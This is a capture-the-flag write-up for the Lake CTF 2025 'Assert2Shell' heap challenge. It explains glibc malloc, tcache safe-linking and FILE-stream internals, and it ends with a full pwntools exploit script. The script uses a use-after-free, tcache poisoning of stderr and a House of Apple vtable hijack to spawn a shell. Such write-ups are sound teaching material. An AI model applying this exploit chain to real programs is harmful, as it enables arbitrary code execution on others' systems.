
Assert2Shell

This challenge is from Lake CTF Quals 2025.

Understanding how Malloc works

Before explaining how the exploit works, we first need to understand a few things about how malloc works.

Bins

Bins in malloc are linked lists, also called free lists, that hold freed heap memory chunks. These linked lists are divided into multiple types:

  • Unsorted Bin (doubly linked list)
  • Large Bin (doubly linked lists)
  • Small Bin (doubly linked lists)
  • Fast Bin (singly linked lists)
  • Tcache Bin (singly linked lists)

As we can see in the glibc source code, the bins are just arrays of free lists. Fast Bin has its own array of free lists, while Unsorted Bin, Small Bin, and Large Bin share the same array, because they are all doubly linked lists. We are going to discuss Tcache Bin a little later.

The following structure is from glibc source code and shows how these bins are stored:

struct malloc_state {
    /* Serialize access.  */
    mutex_t mutex;
    // Should we have padding to move the mutex to its own cache line?

    #if THREAD_STATS
    /* Statistics for locking. Only used if THREAD_STATS is defined.  */
    long stat_lock_direct, stat_lock_loop, stat_lock_wait;
    #endif

    /* The maximum chunk size to be eligible for fastbin */
    INTERNAL_SIZE_T  max_fast;    /* low 2 bits used as flags */

    /* Fastbins */
    mfastbinptr      fastbins[NFASTBINS];

    /* Base of the topmost chunk -- not otherwise kept in a bin */
    mchunkptr        top;

    /* The remainder from the most recent split of a small request */
    mchunkptr        last_remainder;

    /* Normal bins packed as described above */
    mchunkptr        bins[NBINS * 2];
};

Unsorted Bin has just one free list, while Small Bin and Large Bin have 62 and 63 free lists respectively. Unsorted Bin, Small Bin, and Large Bin use doubly linked lists because they support chunk coalescing (merging): when two free chunks that are adjacent in memory sit in the same bin, they can be merged into a single larger chunk, and the doubly linked structure makes removing and merging these contiguous chunks efficient. Fast Bin uses singly linked lists because its chunks are never merged, so no pointer to the previous chunk is needed. The downside is that Fast Bin can suffer from memory fragmentation, which happens when lots of small free chunks can't be merged into one big chunk. One way to trigger consolidation (merging) of the fast bins is to free a chunk bigger than FASTBIN_CONSOLIDATION_THRESHOLD, which is 65536 bytes (64 KB); when fast bin consolidation happens, the resulting chunk is put in the Unsorted Bin. Fast Bin is designed for small chunks: its maximum chunk size is 160 bytes. Small Bin's maximum chunk size is 504 bytes on 32-bit systems (1008 bytes on 64-bit), while Unsorted Bin and Large Bin have no upper limit on chunk size.

The Unsorted Bin has a special use case: every freed chunk is put in the Unsorted Bin first, if it is bigger than what the fast bins can hold. Chunks move out of the Unsorted Bin and into their permanent Small or Large Bins when the allocator iterates through the Unsorted Bin to fulfill a memory request and the current chunk is not the chosen fit.

Another important thing to understand is that the Unsorted Bin, Small Bin, and Large Bin free lists are circular linked lists, so we can never have a null previous or next pointer. Also, when a chunk is freed, the allocator considers its data no longer needed and stores the bk (previous) and fd (next) pointers inside the body of the chunk.
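To see why a circular doubly linked bin never contains null fd/bk pointers, here is a minimal model (an illustration only, not allocator code): the bin header acts as a sentinel node, and an empty bin simply points fd and bk at itself.

```python
# Minimal model of a circular doubly linked bin; the bin header is a sentinel.
class Node:
    def __init__(self, name):
        self.name = name
        self.fd = self   # next pointer; an empty/lone node points to itself
        self.bk = self   # previous pointer

def insert_after(head, node):
    node.fd = head.fd
    node.bk = head
    head.fd.bk = node
    head.fd = node

def unlink(node):
    # The doubly linked structure lets us remove a chunk in O(1),
    # without walking the list -- exactly what coalescing needs.
    node.bk.fd = node.fd
    node.fd.bk = node.bk

bin_head = Node("bin")
chunk = Node("chunk")
insert_after(bin_head, chunk)
print(bin_head.fd.name, chunk.bk.name)  # chunk bin
unlink(chunk)
print(bin_head.fd is bin_head)          # True: empty bin points to itself
```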

My Family Photo

Top Chunk

Now you may ask yourself: if bins are used to return freed chunks, what happens on our very first malloc, or when we request a size that can't be found in any of the bins? In these cases the chunk is returned from the Top Chunk.

The Top Chunk represents the contiguous available memory at the border of the heap, obtained using the brk/sbrk system call. This region is lazily initialized during the first call to malloc. The allocator maintains a top pointer for the Top Chunk to track the starting address of this free memory. When an allocation request cannot be met by the existing bins, the Top Chunk is sliced: one part is returned to the user, and the pointer is updated to reflect the remaining free space.
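The slicing bookkeeping can be sketched as a toy model (made-up addresses, no real chunk headers): the allocator returns the current top pointer and bumps it by the requested size.

```python
# Toy model of Top Chunk slicing: 'top' tracks the start of the free region.
class TopChunk:
    def __init__(self, base, size):
        self.top = base        # start of remaining free memory
        self.end = base + size # current border of the heap

    def allocate(self, size):
        if self.top + size > self.end:
            raise MemoryError("would need to grow the heap (sbrk/mmap)")
        chunk = self.top       # part returned to the user
        self.top += size       # pointer updated to the remaining free space
        return chunk

heap = TopChunk(0x555555559000, 0x21000)  # hypothetical heap base and size
a = heap.allocate(0x110)
b = heap.allocate(0x160)
print(hex(a), hex(b))  # the second chunk starts right after the first
```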

All the components discussed above are managed by the Main Arena struct. The Main Arena is a global instance of struct malloc_state (we saw it previously in the glibc source code). Unlike the chunks, which reside in the dynamic heap memory, the Main Arena struct resides in the data section of libc.so. This means that leaking a pointer into the Main Arena allows us to compute the libc base address.

TCache Bin

The Tcache Bin was added in glibc 2.27. It is also an array of singly linked lists, up to 64 of them, and each list contains at most 7 chunks. The smallest free list holds chunks of at most 32 bytes, while the biggest holds chunks of up to 1040 bytes. Unlike the Main Arena, the Tcache Bin is stored in Thread Local Storage; the name tcache comes from Thread Local Cache. It was designed to fix a speed issue with the Main Arena: when multiple threads try to use the Main Arena at the same time, the arena gets locked for safety, forcing the other threads to wait in line until the lock is released. The tcache avoids this problem entirely. Because each tcache belongs exclusively to one specific thread, it does not need to be locked, allowing threads to grab memory instantly without waiting for others.
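As a rough illustration of how chunk sizes map to those 64 lists, here is a Python sketch of glibc's csize2tidx/tidx2usize macros, assuming the usual 64-bit constants (MALLOC_ALIGNMENT = 16, MINSIZE = 32, SIZE_SZ = 8):

```python
# Sketch of glibc's tcache size-to-bin mapping (64-bit constants assumed).
MALLOC_ALIGNMENT = 16
MINSIZE = 32
SIZE_SZ = 8
TCACHE_MAX_BINS = 64

def csize2tidx(chunk_size):
    """Map a chunk size to its tcache bin index (mirrors csize2tidx)."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

def tidx2usize(idx):
    """Largest usable (request) size served by tcache bin idx."""
    return idx * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ

print(csize2tidx(32))                    # smallest bin -> 0
print(csize2tidx(1040))                  # biggest tcache-able chunk -> 63
print(tidx2usize(TCACHE_MAX_BINS - 1))   # 1032 usable bytes in a 1040-byte chunk
```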

Previously we said that a freed chunk is put in the Unsorted Bin first (if its size is bigger than what the fast bins can hold). This is no longer true since the tcache was added: if a chunk is smaller than 1040 bytes and its tcache list is not full, the chunk is placed in the Tcache Bin; otherwise it is placed in the Unsorted Bin.

Modern glibc includes protections against Tcache Poisoning, a technique where attackers overwrite the fd pointer to redirect malloc to an arbitrary address. Introduced in glibc 2.32, Safe Linking prevents this by obfuscating the fd pointers. Instead of storing raw memory addresses, the allocator XORs the pointer with the chunk's own address shifted right by 12 bits. If an attacker blindly overwrites the fd pointer with a target address, the allocator's decryption process effectively mangles it into an invalid address, causing a crash rather than an arbitrary write.

Tcache struct definitions and a visual representation:

typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees. */
  uintptr_t key;
} tcache_entry;

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

Tcache

The exact way tcache encrypts the fd pointer is by shifting the address of the chunk being inserted into the list 12 bits to the right, then XORing the result with the address of the previous head of the list. If this is the first chunk put in the list, the value it is XORed with is 0.

The glibc macros:

#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))

#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

where pos is the address where the pointer will be stored (the fd field of the chunk being inserted) and ptr is the pointer being stored (the previous head of the list).
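The macro can be mirrored in Python to sanity-check the math (addresses below are made up):

```python
# Python mirror of glibc's PROTECT_PTR: pos is where the pointer is stored,
# ptr is the pointer being stored (the old list head).
def protect_ptr(pos, ptr):
    return (pos >> 12) ^ ptr

chunk_fd_addr = 0x55555555a2a0   # hypothetical address of the chunk's fd field
old_head      = 0x55555555a400   # hypothetical previous head of the list

stored = protect_ptr(chunk_fd_addr, old_head)

# Applying the same operation with the same pos recovers the pointer,
# since XOR is its own inverse -- this is exactly what REVEAL_PTR does.
print(hex(protect_ptr(chunk_fd_addr, stored)))
```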

This section skipped a lot of malloc implementation details to keep the write-up from getting too long; if you want to learn more about malloc, check out the resources at the end of the write-up.

New Mitigation Challenge

protection

Running the given binary prompts us with a menu in which we can choose to allocate, view, free, or edit the content of a chunk.

menu

If we choose to allocate, it asks for the index, the size that we want the chunk to have, and the data that will be put in the chunk.

allocate

The free option asks for the index of the chunk that we want to free, while edit asks for the index and the new data that we want to put in the chunk. View shows us the content of the chunk.

free_edit

view

Playing with the program a little, we find that it has a use-after-free: calling free on the index of a chunk frees the pointer, but does not null out the pointer stored at that index.

By disassembling the program we can see that it has a variable named nops, initialized to 9, that is checked after every operation to be greater than or equal to 0. If it becomes smaller than 0, an assert is triggered that stops the program.

chal

nops

Libc Leak

If we remember from the previous part, a chunk bigger than 1040 bytes goes to the Unsorted Bin, whose head lives in libc. So we allocate a first chunk of, say, 1100 bytes, and then allocate another chunk to prevent consolidation with the Top Chunk. After allocating these two chunks, we free the 1100-byte chunk; it goes into the Unsorted Bin, and the allocator overwrites the body of the chunk with pointers to the head of the Unsorted Bin free list. Knowing that the program has a use-after-free, we can use the view function to leak this Unsorted Bin address. Using pwndbg we can find the libc base address and compute the offset between the libc base and the Unsorted Bin leak, which is 0x211b20.

Tcache Poisoning

Now that we know the libc base address, we can compute the address of the stderr struct _IO_2_1_stderr_ (we'll see later why we use the stderr address); for now, let's focus on the tcache poisoning. Remember the two chunks we allocated earlier: the size of the second chunk is 0x150 (336 bytes), chosen so that when we free it, it goes into the Tcache Bin. After freeing this chunk, we can use the view function again to leak the encrypted fd: when a chunk is the last (or only) node in a tcache list, the value inside the body of the chunk is the encrypted address of the chunk itself. Because we know this is the first chunk in the tcache list, we can easily decrypt the real address. Recall the encryption formula for tcache chunks:

Encrypted_fd = (Chunk_Address >> 12) ^ Previous_Chunk_Address

For our first chunk that goes into the tcache, Previous_Chunk_Address is 0, so the real address is Encrypted_Value (from the view function) << 12. We decrypt this address because we need it to encrypt the stderr struct address. (Malloc tries to decrypt the fd of every chunk that comes out of the tcache, so if we don't encrypt the address, malloc's decryption will mangle it into an invalid value rather than our target address.) The formula for encrypting the stderr struct _IO_2_1_stderr_ is:

(First_Chunk_Address >> 12) ^ _IO_2_1_stderr_
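With made-up addresses, the whole leak-decrypt-encrypt dance looks like this. Note that << 12 drops the low 12 bits of the chunk address, which turns out not to matter, because only the chunk address shifted right by 12 is ever used in the encryption:

```python
def protect_ptr(pos, ptr):          # same formula as glibc's PROTECT_PTR
    return (pos >> 12) ^ ptr

chunk  = 0x55555555a2a0             # hypothetical tcache chunk address
target = 0x7ffff7e1a6a0             # hypothetical _IO_2_1_stderr_ address

leaked    = protect_ptr(chunk, 0)   # last node in the list: XORed with 0
recovered = leaked << 12            # low 12 bits lost, upper bits correct

# The encrypted fd only depends on chunk >> 12, so the lost low bits
# don't change the value we need to write:
print(hex(protect_ptr(recovered, target)))
```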

Knowing this, we can use the edit function to put the encrypted address into the body of the first chunk. Next we call allocate with index 0 to get our first chunk out of the tcache list, and then call allocate again with index 1 to get a chunk at the _IO_2_1_stderr_ address; we now have a write primitive on the stderr struct. The problem is that everything up to this point took 9 function calls, and every call decreases nops by 1, so the very next call triggers the assert and the program closes, limiting our exploit possibilities.

House of Apple

Until now you've probably wondered what happens once we've exhausted our 9 operations. This is where loading _IO_2_1_stderr_ into the tcache becomes crucial, as it grants us a write primitive on it. The solution involves File Stream Oriented Programming (FSOP). First, let's understand how streams are implemented.

stdin, stdout, and stderr are represented in memory as structs; all three share the same struct format, named _IO_FILE_plus:

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

While struct _IO_FILE_plus defines the layout of a single stream (like stdin), these structures do not exist in isolation. Inside the nested file member (which is a struct _IO_FILE), there is a field called _chain. This pointer links all open streams together into a singly linked list, allowing the system to traverse them when needed; for example, exit() traverses the streams to flush them.

struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2:24;
  /* Fallback buffer to use when malloc fails to allocate one.  */
  char _short_backupbuf[1];
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

When exploiting streams we are specifically interested in the vtable pointer at the end of _IO_FILE_plus. This pointer is used when executing helper functions for the stream.

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
};

Of all these functions we are interested in the overflow function. The reason we target overflow is that when a program is closing, for example because of exit(), it first makes sure that no data is sitting in buffers that hasn't been written to the file or the screen; if a stream still has pending data, it calls overflow on it. This can be seen in the glibc source code in the function _IO_flush_all_lockp: first it verifies with fp->_mode <= 0 that the stream does not hold wide data (UTF characters), then it checks whether fp->_IO_write_ptr is bigger than fp->_IO_write_base, which means there is data between the write base and the write pointer.

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
#endif
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

Because of C's short-circuit evaluation, if the first clause fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base is true, the wide-data checks are skipped entirely and _IO_OVERFLOW(fp, EOF) is evaluated; this is how we force _IO_OVERFLOW to execute.

Now, the way we can use this in an exploit is that if we get write access to a stream struct like _IO_2_1_stderr_ (or stdout, stdin), we can compute the offset of the overflow entry in the vtable and overwrite it with the address of the system function. We also need _IO_write_ptr to be greater than _IO_write_base so that the condition above is satisfied and _IO_OVERFLOW is reached. Finally, the flags at the very beginning of the FILE struct are overwritten with a string like "  sh", because the FILE pointer ends up in rdi and thus becomes system's argument.
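The gate we need to pass can be modeled directly from the quoted source; this is just the first clause of the _IO_flush_all_lockp condition, rewritten as a function:

```python
# Model of the first clause of the _IO_flush_all_lockp condition.
def overflow_is_called(mode, write_ptr, write_base):
    # Short-circuit: when this clause is true, the wide-data clause is
    # skipped and _IO_OVERFLOW(fp, EOF) gets evaluated.
    return mode <= 0 and write_ptr > write_base

print(overflow_is_called(mode=0, write_ptr=0x10, write_base=0x0))  # True
print(overflow_is_called(mode=0, write_ptr=0x0, write_base=0x0))   # False
```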

The problem for this challenge is that we can't use this directly, because the binary uses a modern glibc, specifically glibc 2.42 (the latest at the time of writing). Because of this we are going to use the House of Apple exploit chain.

Modern glibc enforces a boundary check (vtable verification). It ensures that the vtable pointer always points into the read-only section of libc where the official vtables reside. If we point it anywhere else (like a heap buffer or the system function), the program detects the anomaly and terminates.

# define _IO_JUMPS_FUNC(THIS) \
  (IO_validate_vtable                                                   \
   (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS)	\
			     + (THIS)->_vtable_offset)))


IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) &__io_vtables;
  if (__glibc_unlikely (offset >= IO_VTABLES_LEN))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

The way we bypass this check, as described in House of Apple, is by using the wide-data vtable _IO_wfile_jumps. Since _IO_wfile_jumps itself lies inside the legitimate vtable region, overwriting the _IO_jump_t pointer with it passes the boundary check, and the wide vtable pointer stored inside _wide_data is not validated at all. With our write primitive on _IO_2_1_stderr_, we overwrite the vtable pointer with _IO_wfile_jumps, set the stream's _mode field appropriately, and make sure we put a valid lock address as well. The last things we need to do are to put the address of the system function at the vtable offset the wide overflow path calls through, and put sh in the flags, in order to pop a shell.
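The check itself is just a range comparison, which is why pointing the vtable at _IO_wfile_jumps (which lives inside __io_vtables) sails through while anything outside that region triggers _IO_vtable_check. A sketch with made-up addresses and region length:

```python
# Model of IO_validate_vtable: valid iff the pointer lands in __io_vtables.
IO_VTABLES_BASE = 0x7ffff7e15000   # hypothetical &__io_vtables
IO_VTABLES_LEN  = 0xa80            # hypothetical length of the vtable region

def vtable_passes(ptr):
    # Unsigned wraparound, as in the C subtraction of uintptr_t values.
    offset = (ptr - IO_VTABLES_BASE) % (1 << 64)
    return offset < IO_VTABLES_LEN

io_wfile_jumps   = IO_VTABLES_BASE + 0x228  # inside the region: check passes
heap_fake_vtable = 0x55555555a2a0           # outside: _IO_vtable_check() fires

print(vtable_passes(io_wfile_jumps))    # True
print(vtable_passes(heap_fake_vtable))  # False
```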

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
exe = context.binary = ELF("./chal")
libc = ELF("./libc.so.6")

def allocate(idx,size,data):
    p.sendlineafter(b'> ',b'1')
    p.sendlineafter(b'idx?: ',str(idx).encode())
    p.sendlineafter(b'size?: ',str(size).encode())
    p.sendlineafter(b'data?: ',data)

def free(idx):
    p.sendlineafter(b'> ',b'3')
    p.sendlineafter(b'idx?: ',str(idx).encode())

def view(idx):
    p.sendlineafter(b'> ',b'2')
    p.sendlineafter(b'idx?: ',str(idx).encode())

def edit(idx,data):
    p.sendlineafter(b'> ',b'4')
    p.sendlineafter(b'idx?: ',str(idx).encode())
    p.sendlineafter(b'new data?: ',data)

p = remote("chall.polygl0ts.ch", 6242)
allocate(0,1100,b'a'*100)
allocate(1,0x150,b'b'*20)

free(0)
view(0)
p.recvuntil(b'meow: ')
libc.address = u64(p.recv(8)) - 0x211b20
print("libc address " + hex(libc.address))

stderr_addr = libc.sym['_IO_2_1_stderr_']
print("_IO_2_1_stderr_ " + hex(stderr_addr))

free(1)
view(1)
p.recvuntil(b'meow: ')
fd_current_pointer = u64(p.recv(8)) << 12
print("fd_pointer " + hex(fd_current_pointer))

encrypted_fd = (fd_current_pointer >> 12) ^ (stderr_addr)
edit(1,p64(encrypted_fd))

allocate(0,0x150,b'a'*10)


fake_vtable_offset = 0x10

wide_data_loc = stderr_addr - 0x10

fs = flat(
    {
        fake_vtable_offset + 0x68: libc.sym['system'],

        0x00: b'  sh'.ljust(8, b'\x00'),
        0x88: libc.address + 2176896,
        0xA0: wide_data_loc,
        0xC0: p32(-1, sign="signed"),
        0xD0: stderr_addr + fake_vtable_offset,

        0xD8: libc.sym['_IO_wfile_jumps'],
    },
    filler=b'\x00'
)

allocate(0, 0x150, fs)
p.interactive()

An explanation of the offsets inside flat:

0x00 - the flags; the FILE pointer arrives in rdi, so we overwrite the start of the struct with "  sh"

0x88 - the address of the lock

0xa0 - the pointer to the _IO_wide_data struct (we point it just before the FILE itself)

0xc0 - the _mode field of the stream

0xd0 - where _wide_data->_wide_vtable is read from; we point it at our fake vtable inside the struct

0xd8 - the _IO_jump_t vtable pointer, which we overwrite with _IO_wfile_jumps
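These offsets fit together because of how _IO_wide_data is laid out. Assuming _wide_vtable sits at offset 0xe0 inside _IO_wide_data (as in current glibc) and using a made-up stderr address, we can sanity-check the payload's arithmetic:

```python
stderr = 0x7ffff7e1a6a0             # hypothetical _IO_2_1_stderr_ address
fake_vtable_offset = 0x10
wide_data = stderr - 0x10           # value the payload writes at FILE offset 0xa0

# _wide_data->_wide_vtable is read at wide_data + 0xe0, which is exactly
# the FILE offset 0xd0 that the payload controls:
print(hex(wide_data + 0xe0 - stderr))   # 0xd0

# The fake wide vtable is placed at stderr + 0x10, so its __doallocate slot
# (offset 0x68 in _IO_jump_t) lands at FILE offset 0x10 + 0x68 = 0x78,
# the slot the payload fills with system():
print(hex(fake_vtable_offset + 0x68))   # 0x78
```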

But there is still a question: how is this triggered? House of Apple describes using exit(), but our program calls assert and then aborts. Looking at the definition of __assert_fail, we can see that it calls __assert_fail_base, which is defined as follows:

__assert_fail_base (const char *fmt, const char *assertion, const char *file,
		    unsigned int line, const char *function)
{
  char *str;

#ifdef FATAL_PREPARE
  FATAL_PREPARE;
#endif

  int total = __asprintf (&str, fmt,
			  __progname, __progname[0] ? ": " : "",
			  file, line,
			  function ? function : "", function ? ": " : "",
			  assertion);
  if (total >= 0)
    {
      /* Print the message.  */
      (void) __fxprintf (NULL, "%s", str);
      (void) fflush (stderr);

      total = ALIGN_UP (total + sizeof (struct abort_msg_s) + 1,
			GLRO(dl_pagesize));
      struct abort_msg_s *buf = __mmap (NULL, total, PROT_READ | PROT_WRITE,
					MAP_ANON | MAP_PRIVATE, -1, 0);
      if (__glibc_likely (buf != MAP_FAILED))
	{
	  buf->size = total;
	  strcpy (buf->msg, str);
	  __set_vma_name (buf, total, " glibc: assert");

	  /* We have to free the old buffer since the application might
	     catch the SIGABRT signal.  */
	  struct abort_msg_s *old = atomic_exchange_acquire (&__abort_msg, buf);

	  if (old != NULL)
	    __munmap (old, old->size);
	}

      free (str);
    }
  else
    {
      /* At least print a minimal message.  */
      char linebuf[INT_STRLEN_BOUND (int) + sizeof ":: "];
      struct iovec v[9];
      int i = 0;

#define WS(s) (v[i].iov_len = strlen (v[i].iov_base = (void *) (s)), i++)

      if (__progname)
	{
	  WS (__progname);
	  WS (": ");
	}

      WS (file);
      v[i++] = (struct iovec) {.iov_base = linebuf,
	.iov_len = sprintf (linebuf, ":%d: ", line)};

      if (function)
	{
	  WS (function);
	  WS (": ");
	}

      WS ("Assertion `");
      WS (assertion);
      /* We omit the '.' here so that the assert tests can tell when
         this code path is taken.  */
      WS ("' failed\n");

      (void) __writev (STDERR_FILENO, v, i);
    }

  abort ();
}

You might think that fflush is what triggers the exploit chain, but in reality __fxprintf does, because assert first needs to print its message before flushing and calling abort. To keep this write-up concise, I'll provide the chain of functions that leads to the hijacked call rather than walking through each one in the glibc source.

  __assert_fail
    __assert_fail_base
        __fxprintf
            __vfxprintf
                _IO_vfprintf_internal (macro as vfprintf)
                    Xprintf (resolved as __printf_buffer_to_file)
                        _IO_sputn (macro)
                            _IO_XSPUTN (macro)
                                |
                                | NOTE: Vtable at offset 0xD8 was modified to point to _IO_wfile_jumps.
                                | Therefore, _IO_XSPUTN computes the address relative to _IO_wfile_jumps,
                                | diverting execution from standard IO to Wide IO.
                                |
                                _IO_wfile_xsputn
                                    _IO_wdefault_xsputn
                                        __woverflow
                                            _IO_OVERFLOW
                                                |
                                                | NOTE: Resolved to _IO_wfile_overflow because of the 
                                                | modified vtable mentioned above.
                                                |
                                                _IO_wfile_overflow
                                                    _IO_wdoallocbuf
                                                        _IO_WDOALLOCATE (macro)
                                                            __doallocate (macro for vtable slot)
                                                                |
                                                                | NOTE: Normally calls _IO_wfile_doallocate (malloc).
                                                                | We overwrote this slot to point to system().
                                                                |
                                                                system("/bin/sh")

EPFL{waittt_IT_IS_EASIER_ON_THE_NEW_ONE!?!?----tcache_count_check,_you_will_not_be_missed.}

Resources used:

ir0nstone.gitbook.io/notes/heap/the-tcache

sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc

www.secquest.co.uk/white-papers/tcache-heap-exploitation

www.roderickchan.cn/zh-cn/house-of-apple-%E4%B8%80%E7%A7%8D%E6%96%B0%E7%9A%84glibc%E4%B8%ADio%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95-1/